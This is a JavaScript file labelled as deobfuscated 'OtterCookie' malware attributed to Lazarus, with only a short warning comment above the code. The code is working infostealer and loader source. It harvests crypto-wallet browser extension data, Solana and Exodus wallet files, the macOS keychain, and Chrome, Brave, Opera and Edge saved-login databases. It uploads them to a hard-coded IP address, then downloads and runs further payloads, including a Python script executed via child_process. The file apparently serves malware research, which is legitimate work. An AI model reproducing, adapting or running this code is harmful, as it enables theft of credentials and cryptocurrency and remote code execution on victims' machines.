//This is OtterCookie (deobfuscated), a malicious implant from Lazarus (DPRK State Sponsored Actors).
//Do not run.
{
const _0x2341e1 = function () {
let _0x212b39 = true;
return function (_0x29c615, _0x3df71a) {
const _0xa42d5d = _0x212b39 ? function () {
if (_0x3df71a) {
const _0x29b668 = _0x3df71a.apply(_0x29c615, arguments);
_0x3df71a = null;
return _0x29b668;
}
} : function () {};
_0x212b39 = false;
return _0xa42d5d;
};
}();
const _0x1f2d44 = _0x2341e1(this, function () {
return _0x1f2d44.toString().search("(((.+)+)+)+$").toString().constructor(_0x1f2d44).search("(((.+)+)+)+$");
});
_0x1f2d44();
const _0x288dcf = function () {
let _0x49a6ec = true;
return function (_0x1b1f47, _0x148a8a) {
const _0x1d82d3 = _0x49a6ec ? function () {
if (_0x148a8a) {
const _0x4b7dae = _0x148a8a.apply(_0x1b1f47, arguments);
_0x148a8a = null;
return _0x4b7dae;
}
} : function () {};
_0x49a6ec = false;
return _0x1d82d3;
};
}();
const _0x1d1279 = _0x288dcf(this, function () {
let _0x117508;
try {
const _0x4de66e = Function("return (function() {}.constructor(\"return this\")( ));");
_0x117508 = _0x4de66e();
} catch (_0x3a553f) {
_0x117508 = window;
}
const _0x28db89 = _0x117508.console = _0x117508.console || {};
const _0x5ee434 = ["log", 'warn', "info", "error", "exception", 'table', "trace"];
for (let _0x2bac87 = 0; _0x2bac87 < _0x5ee434.length; _0x2bac87++) {
const _0x529866 = _0x288dcf.constructor.prototype.bind(_0x288dcf);
const _0x1f164d = _0x5ee434[_0x2bac87];
const _0x377e71 = _0x28db89[_0x1f164d] || _0x529866;
_0x529866.__proto__ = _0x288dcf.bind(_0x288dcf);
_0x529866.toString = _0x377e71.toString.bind(_0x377e71);
_0x28db89[_0x1f164d] = _0x529866;
}
});
_0x1d1279();
const fs = require('fs');
const os = require('os');
const path = require("path");
const request = require("request");
const ex = require("child_process").exec;
const hostname = os.hostname();
const platform = os.platform();
const homeDir = os.homedir();
const tmpDir = os.tmpdir();
const fs_promises = require("fs/promises");
const getAbsolutePath = _0x5cfa4a => _0x5cfa4a.replace(/^~([a-z]+|\/)/, (_0x4746a8, _0x11e90c) => '/' === _0x11e90c ? homeDir : path.dirname(homeDir) + '/' + _0x11e90c);
function testPath(_0x5ab2a7) {
try {
fs.accessSync(_0x5ab2a7);
return true;
} catch (_0x4ae916) {
return false;
}
}
const R = ["Local/BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser"];
const Q = ["Local/Google/Chrome", "Google/Chrome", "google-chrome"];
const X = ["Roaming/Opera Software/Opera Stable", "com.operasoftware.Opera", 'opera'];
const Bt = ["nkbihfbeogaeaoehlefnkodbefgpgknn", "ejbalbakoplchlghecdalmeeeajnimhm", "fhbohimaelbohpjbbldcngcnapndodjp", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "aeachknmefphepccionboohckonoeemg", "hifafgmccdpekplomjjkcfgodnhcellj", "jblndlipeogpafnldhgmapagcccfchpi", "acmacodkjbdgmoleebolmdjonilkdbch", "dlcobpjiigpikoobohmabehhmhfoodbb", "mcohilncbfahbmgdjkbpemcciiolgcge", "agoakfejjabomempkjlepdflaleeobhb", "omaabbefbmiijedngplfjmnooppbclkk", "aholpfdialjgjfhomihkjbmgjidlcdno", "nphplpgoakhhjchkkhmiggakijnkhfnd", "penjlddjkjgpnkllboccdgccekpkcbin", "lgmpcpglpngdoalbgeoldeajfclnhafa", "fldfpgipfncgndfolcbkdeeknbbbnhcc", "bhhhlbepdkbapadjdnnojkbgioiodbic", "aeachknmefphepccionboohckonoeemg", "gjnckgkfmgmibbkoficdidcljeaaaheg", "afbcbjpbpfadlkmhmclhkeeodmamcflc"];
const uploadFiles = async (_0x2cfa26, _0x338795, _0x4cd721, _0x18ee2b) => {
let _0x127784;
if (!_0x2cfa26 || '' === _0x2cfa26) {
return [];
}
try {
if (!testPath(_0x2cfa26)) {
return [];
}
} catch (_0x1bce40) {
return [];
}
if (!_0x338795) {
_0x338795 = '';
}
let _0x3746c0 = [];
for (let _0x48b71a = 0; _0x48b71a < 200; _0x48b71a++) {
const _0x4a7384 = _0x2cfa26 + '/' + (0 === _0x48b71a ? 'Default' : "Profile " + _0x48b71a) + "/Local Extension Settings";
for (let _0x26063a = 0; _0x26063a < Bt.length; _0x26063a++) {
let _0x25cbdf = _0x4a7384 + '/' + Bt[_0x26063a];
if (testPath(_0x25cbdf)) {
let _0x413530 = [];
try {
_0x413530 = fs.readdirSync(_0x25cbdf);
} catch (_0x4baf0b) {
_0x413530 = [];
}
let _0x1f140d = 0;
if (!testPath(getAbsolutePath('~/') + '/.n3')) {
fs_promises.mkdir(getAbsolutePath('~/') + '/.n3');
}
_0x413530.forEach(async _0xb298f4 => {
let _0x1f0e49 = path.join(_0x25cbdf, _0xb298f4);
try {
let _0x3fd3d9 = fs.statSync(_0x1f0e49);
if (_0x3fd3d9.isDirectory()) {
return;
}
if (_0x1f0e49.includes(".log") || _0x1f0e49.includes(".ldb")) {
const _0x3b054e = {
filename: "131_" + _0x338795 + _0x48b71a + '_' + Bt[_0x26063a] + '_' + _0xb298f4
};
_0x3746c0.push({
'value': fs.createReadStream(_0x1f0e49),
'options': _0x3b054e
});
} else {
fs_promises.copyFile(_0x1f0e49, getAbsolutePath('~/') + "/.n3/tp" + _0x1f140d);
const _0x3c9972 = {
filename: "131_" + _0x338795 + _0x48b71a + '_' + Bt[_0x26063a] + '_' + _0xb298f4
};
_0x3746c0.push({
'value': fs.createReadStream(getAbsolutePath('~/') + "/.n3/tp" + _0x1f140d),
'options': _0x3c9972
});
_0x1f140d += 1;
}
} catch (_0x3f7137) {}
});
}
}
}
if (_0x4cd721 && (_0x127784 = homeDir + "/.config/solana/id.json", fs.existsSync(_0x127784))) {
try {
const _0x427a96 = {
filename: "solana_id.txt"
};
_0x3746c0.push({
'value': fs.createReadStream(_0x127784),
'options': _0x427a96
});
} catch (_0x4a2c8b) {}
}
Upload(_0x3746c0, _0x18ee2b);
return _0x3746c0;
};
const uploadMozilla = _0x5ceeb2 => {
const _0x312062 = getAbsolutePath('~/') + "/AppData/Roaming/Mozilla/Firefox/Profiles";
let _0x5ca74b = [];
if (testPath(_0x312062)) {
let _0x4f154c = [];
try {
_0x4f154c = fs.readdirSync(_0x312062);
} catch (_0x558a99) {
_0x4f154c = [];
}
let _0x21f2ab = 0;
_0x4f154c.forEach(async _0x3ff7e2 => {
let _0x2df477 = path.join(_0x312062, _0x3ff7e2);
if (_0x2df477.includes("-release")) {
let _0x5d0745 = path.join(_0x2df477, "/storage/default");
let _0x16c8d1 = [];
_0x16c8d1 = fs.readdirSync(_0x5d0745);
let _0x4258cc = 0;
_0x16c8d1.forEach(async _0x194313 => {
if (_0x194313.includes("moz-extension")) {
let _0x26489e = path.join(_0x5d0745, _0x194313);
_0x26489e = path.join(_0x26489e, 'idb');
let _0x441235 = [];
_0x441235 = fs.readdirSync(_0x26489e);
_0x441235.forEach(async _0x1743e1 => {
if (_0x1743e1.includes('.files')) {
let _0x3e731c = path.join(_0x26489e, _0x1743e1);
let _0x492cab = [];
_0x492cab = fs.readdirSync(_0x3e731c);
_0x492cab.forEach(_0x3b5aa2 => {
if (!fs.statSync(path.join(_0x3e731c, _0x3b5aa2)).isDirectory()) {
let _0x26dfb4 = path.join(_0x3e731c, _0x3b5aa2);
const _0x392d62 = {
filename: _0x21f2ab + '_' + _0x4258cc + '_' + _0x3b5aa2
};
_0x5ca74b.push({
'value': fs.createReadStream(_0x26dfb4),
'options': _0x392d62
});
}
});
}
});
}
});
_0x4258cc += 1;
}
_0x21f2ab += 1;
});
Upload(_0x5ca74b, _0x5ceeb2);
return _0x5ca74b;
}
};
const uploadEs = _0x248e39 => {
let _0xe7777b = '';
let _0x151818 = [];
if ('w' == platform[0]) {
_0xe7777b = getAbsolutePath('~/') + "/AppData/Roaming/Exodus/exodus.wallet";
} else if ('d' == platform[0]) {
_0xe7777b = getAbsolutePath('~/') + "/Library/Application Support/exodus.wallet";
} else {
_0xe7777b = getAbsolutePath('~/') + "/.config/Exodus/exodus.wallet";
}
if (testPath(_0xe7777b)) {
let _0x1d94a4 = [];
try {
_0x1d94a4 = fs.readdirSync(_0xe7777b);
} catch (_0x20029c) {
_0x1d94a4 = [];
}
let _0x22ff99 = 0;
if (!testPath(getAbsolutePath('~/') + "/.n3")) {
fs_promises.mkdir(getAbsolutePath('~/') + '/.n3');
}
_0x1d94a4.forEach(async _0x30cf89 => {
let _0x36ab3a = path.join(_0xe7777b, _0x30cf89);
try {
fs_promises.copyFile(_0x36ab3a, getAbsolutePath('~/') + '/.n3/tp' + _0x22ff99);
const _0x5116e9 = {
filename: "131_" + _0x30cf89
};
_0x151818.push({
'value': fs.createReadStream(getAbsolutePath('~/') + "/.n3/tp" + _0x22ff99),
'options': _0x5116e9
});
_0x22ff99 += 1;
} catch (_0x1ffa11) {}
});
}
Upload(_0x151818, _0x248e39);
return _0x151818;
};
const Upload = (_0x21bea2, _0x270905) => {
const _0x302b03 = {
type: "5346",
hid: "131_" + hostname,
uts: _0x270905,
multi_file: _0x21bea2
};
try {
if (_0x21bea2.length > 0) {
const _0x227424 = {
url: "http://144.172.101.45:1224/uploads",
formData: _0x302b03
};
request.post(_0x227424, (_0x3579c0, _0x55cbc0, _0x3c746e) => {});
}
} catch (_0x1eece0) {}
};
const UpAppData = async (_0x46d63a, _0xc60cfc, _0x2a94c0) => {
try {
let _0x11712d = '';
_0x11712d = 'd' == platform[0] ? getAbsolutePath('~/') + "/Library/Application Support/" + _0x46d63a[1] : 'l' == platform[0] ? getAbsolutePath('~/') + "/.config/" + _0x46d63a[2] : getAbsolutePath('~/') + "/AppData/" + _0x46d63a[0] + "/User Data";
await uploadFiles(_0x11712d, _0xc60cfc + '_', 0 == _0xc60cfc, _0x2a94c0);
} catch (_0x6b487b) {}
};
const UpKeychain = async _0x483fe7 => {
let _0x2ecd1f = [];
let _0xf9d804 = homeDir + "/Library/Keychains/login.keychain";
if (fs.existsSync(_0xf9d804)) {
try {
const _0x176999 = {
filename: "logkc-db"
};
_0x2ecd1f.push({
'value': fs.createReadStream(_0xf9d804),
'options': _0x176999
});
} catch (_0x31d7ac) {}
} else {
_0xf9d804 += "-db";
if (fs.existsSync(_0xf9d804)) {
try {
const _0x15f5ba = {
filename: "logkc-db"
};
_0x2ecd1f.push({
'value': fs.createReadStream(_0xf9d804),
'options': _0x15f5ba
});
} catch (_0x56c0ba) {}
}
}
try {
let _0x4844cf = homeDir + "/Library/Application Support/Google/Chrome";
if (testPath(_0x4844cf)) {
for (let _0x3bdb0a = 0; _0x3bdb0a < 200; _0x3bdb0a++) {
const _0x3d54ce = _0x4844cf + '/' + (0 === _0x3bdb0a ? "Default" : "Profile " + _0x3bdb0a) + "/Login Data";
try {
if (!testPath(_0x3d54ce)) {
continue;
}
const _0x278f1b = _0x4844cf + "/ld_" + _0x3bdb0a;
const _0x1fb84d = {
filename: "pld_" + _0x3bdb0a
};
if (testPath(_0x278f1b)) {
_0x2ecd1f.push({
'value': fs.createReadStream(_0x278f1b),
'options': _0x1fb84d
});
} else {
fs.copyFile(_0x3d54ce, _0x278f1b, _0x2729f9 => {
const _0x39750c = {
filename: "pld_" + _0x3bdb0a
};
let _0x1a4d92 = [{
'value': fs.createReadStream(_0x3d54ce),
'options': _0x39750c
}];
Upload(_0x1a4d92, _0x483fe7);
});
}
} catch (_0x1b9712) {}
}
}
} catch (_0x2cb0b9) {}
try {
let _0x48d2a4 = homeDir + "/Library/Application Support/BraveSoftware/Brave-Browser";
if (testPath(_0x48d2a4)) {
for (let _0x445d1f = 0; _0x445d1f < 200; _0x445d1f++) {
const _0x1bcdfd = _0x48d2a4 + '/' + (0 === _0x445d1f ? "Default" : "Profile " + _0x445d1f);
try {
if (!testPath(_0x1bcdfd)) {
continue;
}
const _0x3a4034 = _0x1bcdfd + "/Login Data";
const _0x5c30f6 = {
filename: "brld_" + _0x445d1f
};
if (testPath(_0x3a4034)) {
_0x2ecd1f.push({
'value': fs.createReadStream(_0x3a4034),
'options': _0x5c30f6
});
} else {
fs.copyFile(_0x1bcdfd, _0x3a4034, _0x2c9670 => {
const _0xfe05df = {
filename: 'brld_' + _0x445d1f
};
let _0x372fde = [{
'value': fs.createReadStream(_0x1bcdfd),
'options': _0xfe05df
}];
Upload(_0x372fde, _0x483fe7);
});
}
} catch (_0x33c817) {}
}
}
} catch (_0x1539e8) {}
Upload(_0x2ecd1f, _0x483fe7);
return _0x2ecd1f;
};
const UpUserData = async (_0x2ae079, _0xb62396, _0x2bd00a) => {
let _0x1290a6 = [];
let _0x3ce261 = '';
_0x3ce261 = 'd' == platform[0] ? getAbsolutePath('~/') + "/Library/Application Support/" + _0x2ae079[1] : 'l' == platform[0] ? getAbsolutePath('~/') + "/.config/" + _0x2ae079[2] : getAbsolutePath('~/') + "/AppData/" + _0x2ae079[0] + "/User Data";
let _0x40664e = _0x3ce261 + "/Local State";
if (fs.existsSync(_0x40664e)) {
try {
const _0x106c96 = {
filename: _0xb62396 + '_lst'
};
_0x1290a6.push({
'value': fs.createReadStream(_0x40664e),
'options': _0x106c96
});
} catch (_0x2a668b) {}
}
try {
if (testPath(_0x3ce261)) {
for (let _0x3770c0 = 0; _0x3770c0 < 200; _0x3770c0++) {
const _0x1f439e = _0x3ce261 + '/' + (0 === _0x3770c0 ? "Default" : "Profile " + _0x3770c0);
try {
if (!testPath(_0x1f439e)) {
continue;
}
const _0xc87d01 = _0x1f439e + "/Login Data";
if (!testPath(_0xc87d01)) {
continue;
}
const _0x3536be = {
filename: _0xb62396 + '_' + _0x3770c0 + "_uld"
};
_0x1290a6.push({
'value': fs.createReadStream(_0xc87d01),
'options': _0x3536be
});
} catch (_0x5e68c6) {}
}
}
} catch (_0x203f7f) {}
Upload(_0x1290a6, _0x2bd00a);
return _0x1290a6;
};
let It = 0;
const extractFile = async _0x3ace93 => {
ex("tar -xf " + _0x3ace93 + " -C " + homeDir, (_0x4df0c5, _0x4d9a43, _0x4db7dd) => {
if (_0x4df0c5) {
fs.rmSync(_0x3ace93);
return void (It = 0);
}
fs.rmSync(_0x3ace93);
Xt();
});
};
const runP = () => {
const _0x59c310 = tmpDir + "\\p.zi";
const _0x247305 = tmpDir + "\\p2.zip";
if (It >= 51476596) {
return;
}
if (fs.existsSync(_0x59c310)) {
try {
var _0x515b1a = fs.statSync(_0x59c310);
if (_0x515b1a.size >= 51476596) {
It = _0x515b1a.size;
fs.rename(_0x59c310, _0x247305, _0x342da9 => {
if (_0x342da9) {
throw _0x342da9;
}
extractFile(_0x247305);
});
} else {
if (It < _0x515b1a.size) {
It = _0x515b1a.size;
} else {
fs.rmSync(_0x59c310);
It = 0;
}
Ht();
}
} catch (_0x5e05e2) {}
} else {
ex("curl -Lo \"" + _0x59c310 + "\" \"" + "http://144.172.101.45:1224/pdown" + "\"", (_0x509e4b, _0x20def1, _0x5249ff) => {
if (_0x509e4b) {
It = 0;
return void Ht();
}
try {
It = 51476596;
fs.renameSync(_0x59c310, _0x247305);
extractFile(_0x247305);
} catch (_0x4e88f5) {}
});
}
};
function Ht() {
setTimeout(() => {
runP();
}, 20000);
}
const Xt = async () => await new Promise((_0x4e11c5, _0x338e41) => {
if ('w' == platform[0]) {
if (fs.existsSync(homeDir + "\\.pyp\\python.exe")) {
(() => {
const _0x396307 = homeDir + "/.npl";
const _0x24104b = "\"" + homeDir + "\\.pyp\\python.exe\" \"" + _0x396307 + "\"";
try {
fs.rmSync(_0x396307);
} catch (_0xa44526) {}
request.get("http://144.172.101.45:1224/client/5346/131", (_0x4f439c, _0x221e8e, _0x15596d) => {
if (!_0x4f439c) {
try {
fs.writeFileSync(_0x396307, _0x15596d);
ex(_0x24104b, (_0x32df66, _0x4d626b, _0x5edd2f) => {});
} catch (_0x2f1e08) {}
}
});
})();
} else {
runP();
}
} else {
(() => {
request.get("http://144.172.101.45:1224/client/5346/131", (_0x4163fc, _0x180506, _0x1b4cae) => {
if (!_0x4163fc) {
fs.writeFileSync(homeDir + "/.npl", _0x1b4cae);
ex("python3 \"" + homeDir + "/.npl\"", (_0x2249c8, _0x2df45f, _0x12432e) => {});
}
});
})();
}
});
var M = 0;
const main = async () => {
try {
const _0x25fde6 = Math.round(new Date().getTime() / 1000);
await (async () => {
try {
await UpAppData(Q, 0, _0x25fde6);
await UpAppData(R, 1, _0x25fde6);
await UpAppData(X, 2, _0x25fde6);
uploadMozilla(_0x25fde6);
uploadEs(_0x25fde6);
if ('w' == platform[0]) {
await uploadFiles(getAbsolutePath('~/') + "/AppData/Local/Microsoft/Edge/User Data", '3_', false, _0x25fde6);
}
if ('d' == platform[0]) {
await UpKeychain(_0x25fde6);
} else {
await UpUserData(Q, 0, _0x25fde6);
await UpUserData(R, 1, _0x25fde6);
await UpUserData(X, 2, _0x25fde6);
}
} catch (_0x1ef1f1) {}
})();
Xt();
} catch (_0x4e61e5) {}
};
main();
Xt();
let Ct = setInterval(() => {
if ((M += 1) < 2) {
main();
} else {
clearInterval(Ct);
}
}, 30000);
}
{
const {
execSync,
spawn
} = require("child_process");
process.on('uncaughtException', a => {});
process.on('unhandledRejection', a => {});
async function start() {
const g = function () {
let k = true;
return function (l, n) {
const o = k ? function () {
if (n) {
const q = n.apply(l, arguments);
n = null;
return q;
}
} : function () {};
k = false;
return o;
};
}();
const h = g(this, function () {
return h.toString().search("(((.+)+)+)+$").toString().constructor(h).search("(((.+)+)+)+$");
});
h();
const i = function () {
let k = true;
return function (l, n) {
const o = k ? function () {
if (n) {
const q = n.apply(l, arguments);
n = null;
return q;
}
} : function () {};
k = false;
return o;
};
}();
const j = i(this, function () {
let k;
try {
const o = Function("return (function() {}.constructor(\"return this\")( ));");
k = o();
} catch (q) {
k = window;
}
const l = k.console = k.console || {};
const n = ["log", "warn", 'info', "error", "exception", "table", "trace"];
for (let r = 0x0; r < n.length; r++) {
const s = i.constructor.prototype.bind(i);
const t = n[r];
const u = l[t] || s;
s.__proto__ = i.bind(i);
s.toString = u.toString.bind(u);
l[t] = s;
}
});
j();
socketServer();
}
const socketServer = async () => {
try {} catch (h) {}
try {} catch (j) {}
try {} catch (l) {}
try {} catch (o) {}
};
start();
}
